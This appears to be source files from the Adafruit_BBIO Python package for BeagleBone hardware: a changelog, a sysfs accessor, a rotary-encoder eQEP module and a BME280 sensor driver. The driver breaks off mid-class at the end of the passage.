1.0.5
----
* @pdp7 (5):
* Merge pull request #153 from MarkAYoder/master
* Fix print syntax to avoid python3 errors
* Merge pull request #160 from MarkAYoder/master
* document how to read QEP1
* Update rotary-encoder-eqep-test.md
* @MarkAYoder (20):
* Have GP0_1 working
* Removed --force to speed things up
* Added GP0 1, 2 and 3
* Flashes 4 LEDs
* Works with button
* Blinks red and gree LEDs
* Blinks all 6 GPIOs
* Added red and green LEDs
* i2c works
* PWD isn't working, yet
* Added port setup
* Switched to apt install
* Added tmp101 to name
* Added LED matrix example
* Removed newline from print
* Added fade
* Adding GPIO defs for uart1
* Testing UT1_0, not working yet
* Switched GP0_0 to GP0_3, etc.
* Added PAUSE and MODE buttons.
1.0.4
----
* @djsutton (1):
* fix TypeError: function takes exactly 3 arguments (2 given) from wait_for_edge
* @pdp7 (29):
* Instruct users to open GitHub issue instead email
* add udev rules and script for non-root access to gpio
* fix file descriptor leak in gpio_set_value()
* document how to test read and write to all GPIO pins
* reduce ADC reads in pytest from 10,000 to 1,000
* close file descriptor to avoid leak
* remove conditional logic for ctrl_dir and ocp_dir size
* increase size of ctrl_dir and ocp_dir for future use
* Document how to run config-pin at boot
* Document how to test eQEP with Rotary Encoder
* Add skeleton for Encoder module to read eQEP
* Add code to Encoder.QEP from PyBBIO.RotaryEncoder
* Adapt code from PyBBIO.RotaryEncoder
* add test for rotary encoder
* read from eqep position file
* return position from getPosition()
  * document how to enable all the eqep pins
* Document how to test eqep pins with rotary encoder
* run config-pin to set pin mux for qep
* update QEP test
* update QEP test for issue #122
* Test if kernel booted wit u-boot overlays
* check if kernel cmdline for uboot overlay
* Add documentation about u-boot overlays
  * Return BBIO_OK when u-boot overlays are enabled
* remove debug printing
* Skip check for device tree loaded if u-boot overlays enabled
* Sleep after loading ADC overlay to allow driver load
* Workaround test failure until TIMERn bug is fixed
* @ltjax (3):
* Use lookup table to prevent duplicate pin export
* Handle already exported pins
* Fix build_path memory leak
* @Vadim-Stupakov (1):
* Fixed issue #145 GPIO library doesn't free GPIO file descriptor. File descriptor leak. Made a little bit refactoring
* @cocasema (8):
* Declare PHONY targets in root Makefile
* Extract BBIO_err into a separate header
* Add syslog and debugging messages
* Add libadafruit-bbio with C++ wrappers for PWM/GPIO
* Add 2 versions of library with c++98 and c++11 abi
* Install header files properly
* Add default values to pwm::start() method.
* Add PWM c++ tests
* @zsserg (2):
* Added error checking for setting pin direction in gpio.setup() (Python)
* Added debug output to set_pin_mode()
1.0.3
----
* Add -Wno-strict-aliasing to CFLAGS to ignore gcc warning
* Resolves GitHub issue #133 by @archey
1.0.2
----
* Merge pull request #130 from adafruit/issue129-usr-leds [1439133]
* Add support for alternate USR LED labels
* Merge pull request #131 from adafruit/fix-gcc-warnings [f0ee018]
* Fix gcc warnings
* Merge pull request #132 from buckket/setup_unicode_fix [4c67dfc]
* Make use of io.open() with explicit file encoding in setup.py
1.0.1
----
* Merge pull request #124 from jpbarraca/master [cf9771a]
* Timeout support for wait_for_edge (replaces PR #62)
* Merge pull request #123 from bubbapizza/master [8b4f7f2]
* Added a delay parameter for GPIO.setup() for udev permissions
* Merge pull request #121 from dengber/master [50e8883]
* ADC.read() returns wrong value
* Merge pull request #64 from olegantonyan/master [d1e8dc1]
* Wait until GPIO file appears on the /sys filesystem (issue #36)
* Merge pull request #106 from cocasema/master [12b79d7]
* Treat warnings as errors
* Merge pull request #119 from JesseMcL/pr [e7e987a]
* Add GPIO pullup configurations and fix PWM Segfault on kernel 4.1+
* Merge pull request #116 from kozga/master [1b04cdf]
* Fix SPI: IOError: [Errno 22] Invalid argument in xfer and xfer2 funct…
1.0.0
----
* Merge pull request #108 from MatthewWest for PWM support in Linux kernel 4.1+
* Merge pull request #96 from PeteLawler for ADC support in Linux kernel 4.1+
* Finally publish new version to PyPi
* Bump major version number to signify long duration since last release
0.0.30
-----
* Merge Python 3 compatibility fixes from Github user westphahl.
* Moved old Angstrom build fix for missing py_compile from setup.py to separate file.
0.0.20
----
* Fix for SPI not loading spidevX.X correctly based on load order
* Initialize ctrl_dir in unload_device_tree #63
* Clean up unused/dead code
0.0.19
----
* Fix for SPI.xfer crashes python after 3 calls
* Added a retry to reading for the analog inputs to avoid a bug where reading back and forth between two analog inputs would cause the resource to be unavailable every 16 scans (zthorson)
* Updated the build_path to be more selective over what paths it chooses (zthorson)
* Update Debian installation instructions in README (justinledwards)
* Increase the size of the buffer used for storing device tree names (SaintGimp)
0.0.18
----
* UART - Include UART overlays, and compile upon installation
* UART - Rename UART overlays
* Adafruit_I2C - Remove readU16Rev and readS16Rev
* Adafruit_I2C - Updated readU16/readS16 for correct 16-bit reads
0.0.17
----
* Fix SPI memory leaks
* Clean up of PWM code (bit-hacker, jwcooper)
* Remove UART debug statements
0.0.16
----
* Add polarity as optional fourth parameter to PWM.start(). Valid values are 0 and 1. Default is still 0.
* Fix for actually setting the polarity in start.
* Add new unit tests to check that the polarity is being set properly, and valid values passed in.
0.0.15
----
* Fix PWM duty cycle so 0 is off and 100 is on. Set polarity to 0 by default.
* Give extra buffer space in export, and unexport functions for gpio that are more than 2 digits (Chris Desjardins)
* Add new test case for 3 digit gpio (Chris Desjardins)
* Fix for test_direction_readback. gpio_get_direction wasn't properly null terminating the direction string (Chris Desjardins)
0.0.14
----
* Fix GPIO.gpio_function to work with the IO name (zthorson)
* Fix IOErrors not getting raised when fopen fails while loading overlays into device tree (bradfordboyle, jwcooper)
* Add new UART tests
0.0.13
----
* Remove the gpio parameter from callbacks (cdesjardins)
0.0.12
----
* Bump version due to pypi issues
0.0.11
----
* New UART module to export UART overlays
* Alpha support for SPI
* Add small delay after loading any device tree overlays
0.0.10
____
* Fix direction for event detection code
* Fix for segmentation faults on add_event_detect
0.0.9
____
* Fix for ADC Segmentation Faults
0.0.8
____
* Temp remove overlay compilation. Ubuntu failures.
0.0.7
____
* Refactor and clean up adc and pwm
* Fix tests for Adafruit_BBIO rename
0.0.6
____
* Include Adafruit_I2C.py as top-level module
0.0.5
----
* Rename from BBIO to Adafruit_BBIO to reduce library conflicts and confusion.
0.0.4
----
* Support for pip and easy_install
0.0.3
____
* ADC enabled
0.0.2
____
* PWM enabled
0.0.1
____
* Initial Commit
* GPIO mostly working
* Initial GPIO unit tests
* PWM in progress
| Adafruit-BBIO | /Adafruit_BBIO-1.2.0.tar.gz/Adafruit_BBIO-1.2.0/CHANGELOG.md | CHANGELOG.md |
# Copyright (c) 2014 MIT OpenCourseWare
# Copyright (c) 2017 Adafruit Industries
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
# Code originally published at http://stackoverflow.com/questions/4648792/ and
# subsequently forked at https://github.com/ponycloud/python-sysfs
#
# Original author: Benedikt Reinartz <[email protected]>
# Contributors:
# - Jan Dvořák <[email protected]>
# - Jonathon Reinhart https://github.com/JonathonReinhart
# - Ondřej Koch <[email protected]>
# - David Planella <[email protected]>
"""
Simplistic Python SysFS interface. It enables access to the sys filesystem device
nodes and to get and set their exposed attributes.
Usage examples::
from sysfs import sys
# Print all block devices in /sys, with their sizes
for block_dev in sys.block:
print(block_dev, str(int(block_dev.size) / 1048576) + ' M')
>>> import sysfs
>>> # Read/write Beaglebone Black's eQEP module attributes
>>> eqep0 = sysfs.Node("/sys/devices/platform/ocp/48300000.epwmss/48300180.eqep")
>>> # Read eqep attributes
>>> eqep0.enabled
'1'
>>> eqep0.mode
'0'
>>> eqep0.period
'1000000000'
>>> eqep0.position
'0'
>>> # Write eqep attributes. They should be strings.
>>> eqep0.position = str(2)
>>> eqep0.position
'2'
"""
from os import listdir
from os.path import isdir, isfile, join, realpath, basename
__all__ = ['sys', 'Node']
class Node(object):
    """Attribute-style accessor for a directory under /sys.

    Each attribute access maps onto an entry of the node's directory:
    reading a file attribute returns its stripped text contents, reading a
    subdirectory attribute returns a child Node, and assigning a string to
    a file attribute writes it to that file.  Item access (node['name'])
    is an alias for attribute access.
    """
    # __dict__ is kept alongside the fixed _path_ slot so that listdir()
    # results can be pre-registered as attribute names in __init__.
    __slots__ = ['_path_', '__dict__']
    def __init__(self, path='/sys'):
        """Create a node rooted at *path* (default '/sys').

        Raises:
            RuntimeError: if the resolved path is not inside /sys --
                writing arbitrary files through this interface would be
                dangerous.
        """
        self._path_ = realpath(path)
        if not self._path_.startswith('/sys/') and not '/sys' == self._path_:
            raise RuntimeError('Using this on non-sysfs files is dangerous!')
        # Pre-populate attribute names (values None) from the directory
        # listing so dir()/tab-completion shows the available entries.
        self.__dict__.update(dict.fromkeys(listdir(self._path_)))
    def __repr__(self):
        return '<sysfs.Node "%s">' % self._path_
    def __str__(self):
        return basename(self._path_)
    def __setattr__(self, name, val):
        # Underscore-prefixed names (e.g. _path_) are ordinary attributes.
        if name.startswith('_'):
            return object.__setattr__(self, name, val)
        path = realpath(join(self._path_, name))
        if isfile(path):
            with open(path, 'w') as fp:
                fp.write(val)
        else:
            raise RuntimeError('Cannot write to non-files.')
    def __getattribute__(self, name):
        # Underscore-prefixed names bypass the sysfs lookup entirely.
        if name.startswith('_'):
            return object.__getattribute__(self, name)
        path = realpath(join(self._path_, name))
        if isfile(path):
            with open(path, 'r') as fp:
                return fp.read().strip()
        elif isdir(path):
            return Node(path)
        # NOTE(review): a name that is neither a file nor a directory falls
        # through here and yields None instead of raising AttributeError --
        # confirm callers rely on this before changing it.
    def __setitem__(self, name, val):
        return setattr(self, name, val)
    def __getitem__(self, name):
        return getattr(self, name)
    def __iter__(self):
        # Iterate over the node's entries as resolved values (file contents
        # or child Nodes), in listdir() order.
        return iter(getattr(self, name) for name in listdir(self._path_))
# Module-level root node for the whole /sys tree; deliberately named "sys"
# as part of this module's public API (see __all__ above).
sys = Node()
from subprocess import check_output, STDOUT, CalledProcessError
import os
import logging
import itertools
from .sysfs import Node
import platform
# The eQEP sysfs interface used by this module needs Linux >= 4.4.
# Compare (major, minor) as a tuple: the previous check
# `int(major) >= 4 and int(minor) >= 4` wrongly rejected newer kernels
# such as 5.0 or 6.1 (whose minor component is < 4).  The version list is
# padded so releases with fewer than three components also unpack cleanly.
(major, minor, patch) = (platform.release().split("-")[0].split(".") +
                         ["0", "0"])[:3]
if (int(major), int(minor)) < (4, 4) \
        and platform.node() == 'beaglebone':
    raise ImportError(
        'The Encoder module requires Linux kernel version >= 4.4.x.\n'
        'Please upgrade your kernel to use this module.\n'
        'Your Linux kernel version is {}.'.format(platform.release()))
# Channel identifiers double as indexes into _eQEP_DEFS below.
eQEP0 = 0
'''eQEP0 channel identifier, pin A-- P9.92, pin B-- P9.27 on Beaglebone
Black.'''
eQEP1 = 1
'''eQEP1 channel identifier, pin A-- P9.35, pin B-- P9.33 on Beaglebone
Black.'''
eQEP2 = 2
'''eQEP2 channel identifier, pin A-- P8.12, pin B-- P8.11 on Beaglebone Black.
Note that there is only one eQEP2 module. This is one alternative set of pins
where it is exposed, which is mutually-exclusive with eQEP2b'''
eQEP2b = 3
'''eQEP2(b) channel identifier, pin A-- P8.41, pin B-- P8.42 on Beaglebone
Black. Note that there is only one eQEP2 module. This is one alternative set of
pins where it is exposed, which is mutually-exclusive with eQEP2'''
# Definitions to initialize the eQEP modules
# (sysfs paths are the memory-mapped ePWMSS subsystem addresses on the AM335x)
# NOTE(review): the eQEP1 docstring above says pins P9.35/P9.33, but the
# definition below uses P8_35/P8_33 -- confirm which is correct.
_OCP_PATH = "/sys/devices/platform/ocp"
_eQEP_DEFS = [
    {'channel': 'eQEP0', 'pin_A': 'P9_92', 'pin_B': 'P9_27',
     'sys_path': os.path.join(_OCP_PATH, '48300000.epwmss/48300180.eqep')},
    {'channel': 'eQEP1', 'pin_A': 'P8_35', 'pin_B': 'P8_33',
     'sys_path': os.path.join(_OCP_PATH, '48302000.epwmss/48302180.eqep')},
    {'channel': 'eQEP2', 'pin_A': 'P8_12', 'pin_B': 'P8_11',
     'sys_path': os.path.join(_OCP_PATH, '48304000.epwmss/48304180.eqep')},
    {'channel': 'eQEP2b', 'pin_A': 'P8_41', 'pin_B': 'P8_42',
     'sys_path': os.path.join(_OCP_PATH, '48304000.epwmss/48304180.eqep')}
]
class _eQEP(object):
    '''Abstraction for a single Enhanced Quadrature Encoder Pulse (eQEP)
    channel on the Beaglebone (eQEP0, eQEP1, or eQEP2/eQEP2b).'''

    @classmethod
    def fromdict(cls, d):
        '''Creates a class instance from a dictionary'''
        # keep only the keys that map onto __init__ parameters
        accepted = ('channel', 'pin_A', 'pin_B', 'sys_path')
        kwargs = dict((key, value) for key, value in d.items()
                      if key in accepted)
        return cls(**kwargs)

    def __init__(self, channel, pin_A, pin_B, sys_path):
        '''Initialize the given eQEP channel

        Attributes:
            channel (str): eQEP channel name, e.g. "eQEP0".  "eQEP2" and
                "eQEP2b" are aliases for the same module exposed on two
                mutually-exclusive sets of pins.
            pin_A (str): physical input pin for the A signal of the
                rotary encoder
            pin_B (str): physical input pin for the B signal of the
                rotary encoder
            sys_path (str): sys filesystem path of this eQEP module
            node (Node): sysfs accessor for the channel's readable and
                writable control attributes
        '''
        self.channel = channel
        self.pin_A = pin_A
        self.pin_B = pin_B
        self.sys_path = sys_path
        self.node = Node(sys_path)
class RotaryEncoder(object):
    '''
    Rotary encoder class abstraction to control a given QEP channel.

    Args:
        eqep_num (int): determines which eQEP pins are set up.
            Allowed values: EQEP0, EQEP1, EQEP2 or EQEP2b,
            based on which pins the physical rotary encoder
            is connected to.
    '''
    def _run_cmd(self, cmd):
        '''Runs a command. If not successful (i.e. error code different than
        zero), print the stderr output as a warning.

        Args:
            cmd (list of str): command and its arguments, passed as-is
                to ``check_output``.
        '''
        # NOTE(review): check_output, STDOUT and CalledProcessError are not
        # defined in this chunk; presumably imported from subprocess at the
        # top of the module -- confirm.
        try:
            output = check_output(cmd, stderr=STDOUT)
            self._logger.info(
                "_run_cmd(): cmd='{}' return code={} output={}".format(
                    " ".join(cmd), 0, output))
        except CalledProcessError as e:
            # Best-effort: a failing command is only logged, never raised.
            self._logger.warning(
                "_run_cmd(): cmd='{}' return code={} output={}".format(
                    " ".join(cmd), e.returncode, e.output))

    def _config_pin(self, pin):
        '''Configures a pin in QEP mode using the `config-pin` binary'''
        self._run_cmd(["config-pin", pin, "qep"])

    def __init__(self, eqep_num):
        '''Creates an instance of the class RotaryEncoder.

        Args:
            eqep_num (int): index into the module-level _eQEP_DEFS list
                (one of eQEP0 .. eQEP2b) selecting the channel and pins.
        '''
        # nanoseconds factor to convert period to frequency and back
        self._NS_FACTOR = 1000000000
        # Set up logging at the module level
        self._logger = logging.getLogger(__name__)
        self._logger.addHandler(logging.NullHandler())
        # Initialize the eQEP channel structures
        self._eqep = _eQEP.fromdict(_eQEP_DEFS[eqep_num])
        self._logger.info(
            "Configuring: {}, pin A: {}, pin B: {}, sys path: {}".format(
                self._eqep.channel, self._eqep.pin_A, self._eqep.pin_B,
                self._eqep.sys_path))
        # Configure the pins for the given channel
        self._config_pin(self._eqep.pin_A)
        self._config_pin(self._eqep.pin_B)
        self._logger.debug(
            "RotaryEncoder(): sys node: {0}".format(self._eqep.sys_path))
        # Enable the channel upon initialization
        self.enable()

    @property
    def enabled(self):
        '''Returns the enabled status of the module:

        Returns:
            bool: True if the eQEP channel is enabled, False otherwise.
        '''
        # The sysfs attribute reads back as the text "0"/"1".
        isEnabled = bool(int(self._eqep.node.enabled))
        return isEnabled

    def _setEnable(self, enabled):
        '''Turns the eQEP hardware ON or OFF

        Args:
            enabled (int): enable the module with 1, disable it with 0.

        Raises:
            ValueError: if the value for enabled is < 0 or > 1
        '''
        enabled = int(enabled)
        if enabled < 0 or enabled > 1:
            raise ValueError(
                'The "enabled" attribute can only be set to 0 or 1. '
                'You attempted to set it to {}.'.format(enabled))
        # Written as a string: the sysfs node only accepts text.
        self._eqep.node.enabled = str(enabled)
        self._logger.info("Channel: {}, enabled: {}".format(
            self._eqep.channel, self._eqep.node.enabled))

    def enable(self):
        '''Turns the eQEP hardware ON'''
        self._setEnable(1)

    def disable(self):
        '''Turns the eQEP hardware OFF'''
        self._setEnable(0)

    @property
    def mode(self):
        '''Returns the mode the eQEP hardware is in.

        Returns:
            int: 0 if the eQEP channel is configured in absolute mode,
            1 if configured in relative mode.
        '''
        mode = int(self._eqep.node.mode)
        if mode == 0:
            mode_name = "absolute"
        elif mode == 1:
            mode_name = "relative"
        else:
            mode_name = "invalid"
        self._logger.debug("getMode(): Channel {}, mode: {} ({})".format(
            self._eqep.channel, mode, mode_name))
        return mode

    @mode.setter
    def mode(self, mode):
        '''Sets the eQEP mode as absolute (0) or relative (1).

        See the setAbsolute() and setRelative() methods for
        more information.

        Raises:
            ValueError: if mode is not 0 or 1.
        '''
        mode = int(mode)
        if mode < 0 or mode > 1:
            raise ValueError(
                'The "mode" attribute can only be set to 0 or 1. '
                'You attempted to set it to {}.'.format(mode))
        self._eqep.node.mode = str(mode)
        self._logger.debug("Mode set to: {}".format(
            self._eqep.node.mode))

    def setAbsolute(self):
        '''Sets the eQEP mode as Absolute:
        The position starts at zero and is incremented or
        decremented by the encoder's movement
        '''
        self.mode = 0

    def setRelative(self):
        '''Sets the eQEP mode as Relative:
        The position is reset when the unit timer overflows.
        '''
        self.mode = 1

    @property
    def position(self):
        '''Returns the current position of the encoder.

        In absolute mode, this attribute represents the current position
        of the encoder.
        In relative mode, this attribute represents the position of the
        encoder at the last unit timer overflow.
        '''
        position = self._eqep.node.position
        self._logger.debug("Get position: Channel {}, position: {}".format(
            self._eqep.channel, position))
        return int(position)

    @position.setter
    def position(self, position):
        '''Sets the current position to a new value'''
        position = int(position)
        self._eqep.node.position = str(position)
        self._logger.debug("Set position: Channel {}, position: {}".format(
            self._eqep.channel, position))

    @property
    def frequency(self):
        '''Returns the frequency in Hz at which the driver reports
        new positions.  (The original docstring incorrectly said "Sets".)
        '''
        # Derived from the driver's reporting period, held in nanoseconds.
        frequency = self._NS_FACTOR / int(self._eqep.node.period)
        # NOTE(review): the log label says "Set" but this is the getter.
        self._logger.debug(
            "Set frequency(): Channel {}, frequency: {} Hz, "
            "period: {} ns".format(
                self._eqep.channel, frequency,
                self._eqep.node.period))
        return frequency

    @frequency.setter
    def frequency(self, frequency):
        '''Sets the frequency in Hz at which the driver reports
        new positions.
        '''
        # github issue #299: force period to be an integer
        period = int(self._NS_FACTOR / frequency)  # Period in nanoseconds
        self._eqep.node.period = str(period)
        self._logger.debug(
            "Set frequency(): Channel {}, frequency: {} Hz, "
            "period: {} ns".format(
                self._eqep.channel, frequency, period))

    def zero(self):
        '''Resets the current position to 0'''
        self.position = 0
import logging
import time
# BME280 default address.
BME280_I2CADDR = 0x77
# Operating Modes (oversampling codes written into the ctrl registers)
BME280_OSAMPLE_1 = 1
BME280_OSAMPLE_2 = 2
BME280_OSAMPLE_4 = 3
BME280_OSAMPLE_8 = 4
BME280_OSAMPLE_16 = 5
# Standby Settings (inactive-duration codes for the config register)
BME280_STANDBY_0p5 = 0
BME280_STANDBY_62p5 = 1
BME280_STANDBY_125 = 2
BME280_STANDBY_250 = 3
BME280_STANDBY_500 = 4
BME280_STANDBY_1000 = 5
BME280_STANDBY_10 = 6
BME280_STANDBY_20 = 7
# Filter Settings (IIR filter coefficient codes)
BME280_FILTER_off = 0
BME280_FILTER_2 = 1
BME280_FILTER_4 = 2
BME280_FILTER_8 = 3
BME280_FILTER_16 = 4
# BME280 Registers
BME280_REGISTER_DIG_T1 = 0x88  # Trimming parameter registers
BME280_REGISTER_DIG_T2 = 0x8A
BME280_REGISTER_DIG_T3 = 0x8C
BME280_REGISTER_DIG_P1 = 0x8E
BME280_REGISTER_DIG_P2 = 0x90
BME280_REGISTER_DIG_P3 = 0x92
BME280_REGISTER_DIG_P4 = 0x94
BME280_REGISTER_DIG_P5 = 0x96
BME280_REGISTER_DIG_P6 = 0x98
BME280_REGISTER_DIG_P7 = 0x9A
BME280_REGISTER_DIG_P8 = 0x9C
BME280_REGISTER_DIG_P9 = 0x9E
BME280_REGISTER_DIG_H1 = 0xA1
BME280_REGISTER_DIG_H2 = 0xE1
BME280_REGISTER_DIG_H3 = 0xE3
BME280_REGISTER_DIG_H4 = 0xE4
BME280_REGISTER_DIG_H5 = 0xE5
BME280_REGISTER_DIG_H6 = 0xE6
BME280_REGISTER_DIG_H7 = 0xE7
BME280_REGISTER_CHIPID = 0xD0
BME280_REGISTER_VERSION = 0xD1
BME280_REGISTER_SOFTRESET = 0xE0
BME280_REGISTER_STATUS = 0xF3
BME280_REGISTER_CONTROL_HUM = 0xF2
BME280_REGISTER_CONTROL = 0xF4
BME280_REGISTER_CONFIG = 0xF5
BME280_REGISTER_DATA = 0xF7


class BME280(object):
    """Driver for the Bosch BME280 temperature/pressure/humidity sensor
    over I2C."""

    def __init__(self, t_mode=BME280_OSAMPLE_1, p_mode=BME280_OSAMPLE_1, h_mode=BME280_OSAMPLE_1,
                 standby=BME280_STANDBY_250, filter=BME280_FILTER_off, address=BME280_I2CADDR, i2c=None,
                 **kwargs):
        """Create the sensor object, validate the oversampling/standby/filter
        codes, load factory calibration and put the device in Normal mode.

        Raises:
            ValueError: if any of t_mode/p_mode/h_mode/standby/filter is not
                one of the module-level constant codes.
        """
        # Fix: the logger was misnamed 'Adafruit_BMP.BMP085' (copy-paste
        # from the BMP085 driver); name it after this driver instead.
        self._logger = logging.getLogger('Adafruit_BME280.BME280')
        # Check that t_mode is valid.
        if t_mode not in [BME280_OSAMPLE_1, BME280_OSAMPLE_2, BME280_OSAMPLE_4,
                          BME280_OSAMPLE_8, BME280_OSAMPLE_16]:
            raise ValueError(
                'Unexpected t_mode value {0}.'.format(t_mode))
        self._t_mode = t_mode
        # Check that p_mode is valid.
        if p_mode not in [BME280_OSAMPLE_1, BME280_OSAMPLE_2, BME280_OSAMPLE_4,
                          BME280_OSAMPLE_8, BME280_OSAMPLE_16]:
            raise ValueError(
                'Unexpected p_mode value {0}.'.format(p_mode))
        self._p_mode = p_mode
        # Check that h_mode is valid.
        if h_mode not in [BME280_OSAMPLE_1, BME280_OSAMPLE_2, BME280_OSAMPLE_4,
                          BME280_OSAMPLE_8, BME280_OSAMPLE_16]:
            raise ValueError(
                'Unexpected h_mode value {0}.'.format(h_mode))
        self._h_mode = h_mode
        # Check that standby is valid.
        if standby not in [BME280_STANDBY_0p5, BME280_STANDBY_62p5, BME280_STANDBY_125, BME280_STANDBY_250,
                           BME280_STANDBY_500, BME280_STANDBY_1000, BME280_STANDBY_10, BME280_STANDBY_20]:
            raise ValueError(
                'Unexpected standby value {0}.'.format(standby))
        self._standby = standby
        # Check that filter is valid.  (Parameter name shadows the builtin,
        # kept for backward compatibility with existing callers.)
        if filter not in [BME280_FILTER_off, BME280_FILTER_2, BME280_FILTER_4, BME280_FILTER_8, BME280_FILTER_16]:
            raise ValueError(
                'Unexpected filter value {0}.'.format(filter))
        self._filter = filter
        # Create I2C device.
        if i2c is None:
            import Adafruit_GPIO.I2C as I2C
            i2c = I2C
        # Create device, catch permission errors
        # NOTE(review): printing and calling exit() from a library swallows
        # the original error; re-raising would be preferable, but the
        # historical behavior is preserved here.
        try:
            self._device = i2c.get_i2c_device(address, **kwargs)
        except IOError:
            print("Unable to communicate with sensor, check permissions.")
            exit()
        # Load calibration values.
        self._load_calibration()
        self._device.write8(BME280_REGISTER_CONTROL, 0x24)  # Sleep mode
        time.sleep(0.002)
        self._device.write8(BME280_REGISTER_CONFIG, ((standby << 5) | (filter << 2)))
        time.sleep(0.002)
        self._device.write8(BME280_REGISTER_CONTROL_HUM, h_mode)  # Set Humidity Oversample
        self._device.write8(BME280_REGISTER_CONTROL, ((t_mode << 5) | (p_mode << 2) | 3))  # Set Temp/Pressure Oversample and enter Normal mode
        self.t_fine = 0.0

    def _load_calibration(self):
        """Read the factory trimming parameters into dig_* attributes."""
        self.dig_T1 = self._device.readU16LE(BME280_REGISTER_DIG_T1)
        self.dig_T2 = self._device.readS16LE(BME280_REGISTER_DIG_T2)
        self.dig_T3 = self._device.readS16LE(BME280_REGISTER_DIG_T3)
        self.dig_P1 = self._device.readU16LE(BME280_REGISTER_DIG_P1)
        self.dig_P2 = self._device.readS16LE(BME280_REGISTER_DIG_P2)
        self.dig_P3 = self._device.readS16LE(BME280_REGISTER_DIG_P3)
        self.dig_P4 = self._device.readS16LE(BME280_REGISTER_DIG_P4)
        self.dig_P5 = self._device.readS16LE(BME280_REGISTER_DIG_P5)
        self.dig_P6 = self._device.readS16LE(BME280_REGISTER_DIG_P6)
        self.dig_P7 = self._device.readS16LE(BME280_REGISTER_DIG_P7)
        self.dig_P8 = self._device.readS16LE(BME280_REGISTER_DIG_P8)
        self.dig_P9 = self._device.readS16LE(BME280_REGISTER_DIG_P9)
        self.dig_H1 = self._device.readU8(BME280_REGISTER_DIG_H1)
        self.dig_H2 = self._device.readS16LE(BME280_REGISTER_DIG_H2)
        self.dig_H3 = self._device.readU8(BME280_REGISTER_DIG_H3)
        self.dig_H6 = self._device.readS8(BME280_REGISTER_DIG_H7)
        # dig_H4 and dig_H5 are 12-bit values sharing register 0xE5
        # (BME280_REGISTER_DIG_H5): its low nibble belongs to dig_H4 and
        # its high nibble to dig_H5.
        h4 = self._device.readS8(BME280_REGISTER_DIG_H4)
        h4 = (h4 << 4)
        self.dig_H4 = h4 | (self._device.readU8(BME280_REGISTER_DIG_H5) & 0x0F)
        h5 = self._device.readS8(BME280_REGISTER_DIG_H6)
        h5 = (h5 << 4)
        self.dig_H5 = h5 | (
            self._device.readU8(BME280_REGISTER_DIG_H5) >> 4 & 0x0F)
        # (A block of dead Python-2 debug print statements was removed here.)

    def read_raw_temp(self):
        """Waits for a conversion to finish, then does a single burst read
        of all data values from the device (cached in self.BME280Data) and
        returns the raw (uncompensated) temperature."""
        while (self._device.readU8(BME280_REGISTER_STATUS) & 0x08):  # Wait for conversion to complete (TODO : add timeout)
            time.sleep(0.002)
        self.BME280Data = self._device.readList(BME280_REGISTER_DATA, 8)
        raw = ((self.BME280Data[3] << 16) | (self.BME280Data[4] << 8) | self.BME280Data[5]) >> 4
        return raw

    def read_raw_pressure(self):
        """Returns the raw (uncompensated) pressure level from the sensor.

        Assumes that the temperature has already been read, i.e. that
        self.BME280Data has been populated by read_raw_temp().
        """
        raw = ((self.BME280Data[0] << 16) | (self.BME280Data[1] << 8) | self.BME280Data[2]) >> 4
        return raw

    def read_raw_humidity(self):
        """Returns the raw (uncompensated) humidity value from the sensor.

        Assumes that the temperature has already been read, i.e. that
        self.BME280Data has been populated by read_raw_temp().
        """
        raw = (self.BME280Data[6] << 8) | self.BME280Data[7]
        return raw

    def read_temperature(self):
        """Gets the compensated temperature in degrees celsius.

        Also updates self.t_fine, which the pressure and humidity
        compensation formulas depend on.
        """
        # float in Python is double precision
        UT = float(self.read_raw_temp())
        var1 = (UT / 16384.0 - float(self.dig_T1) / 1024.0) * float(self.dig_T2)
        var2 = ((UT / 131072.0 - float(self.dig_T1) / 8192.0) * (
            UT / 131072.0 - float(self.dig_T1) / 8192.0)) * float(self.dig_T3)
        self.t_fine = int(var1 + var2)
        temp = (var1 + var2) / 5120.0
        return temp

    def read_pressure(self):
        """Gets the compensated pressure in Pascals.

        Requires a fresh self.t_fine; read_raw_pressure() itself relies on
        read_raw_temp() having populated the burst-read buffer.
        """
        adc = float(self.read_raw_pressure())
        var1 = float(self.t_fine) / 2.0 - 64000.0
        var2 = var1 * var1 * float(self.dig_P6) / 32768.0
        var2 = var2 + var1 * float(self.dig_P5) * 2.0
        var2 = var2 / 4.0 + float(self.dig_P4) * 65536.0
        var1 = (
            float(self.dig_P3) * var1 * var1 / 524288.0 + float(self.dig_P2) * var1) / 524288.0
        var1 = (1.0 + var1 / 32768.0) * float(self.dig_P1)
        if var1 == 0:
            # Avoid division by zero (e.g. uninitialized calibration).
            return 0
        p = 1048576.0 - adc
        p = ((p - var2 / 4096.0) * 6250.0) / var1
        var1 = float(self.dig_P9) * p * p / 2147483648.0
        var2 = p * float(self.dig_P8) / 32768.0
        p = p + (var1 + var2 + float(self.dig_P7)) / 16.0
        return p

    def read_humidity(self):
        """Gets the compensated relative humidity in percent (0-100)."""
        adc = float(self.read_raw_humidity())
        h = float(self.t_fine) - 76800.0
        h = (adc - (float(self.dig_H4) * 64.0 + float(self.dig_H5) / 16384.0 * h)) * (
            float(self.dig_H2) / 65536.0 * (1.0 + float(self.dig_H6) / 67108864.0 * h * (
                1.0 + float(self.dig_H3) / 67108864.0 * h)))
        h = h * (1.0 - float(self.dig_H1) * h / 524288.0)
        # Clamp to the physically meaningful range.
        if h > 100:
            h = 100
        elif h < 0:
            h = 0
        return h

    def read_temperature_f(self):
        """Wrapper to get the compensated temperature in Fahrenheit."""
        celsius = self.read_temperature()
        temp = celsius * 1.8 + 32
        return temp

    def read_pressure_inches(self):
        """Wrapper to get the compensated pressure in inches of Hg."""
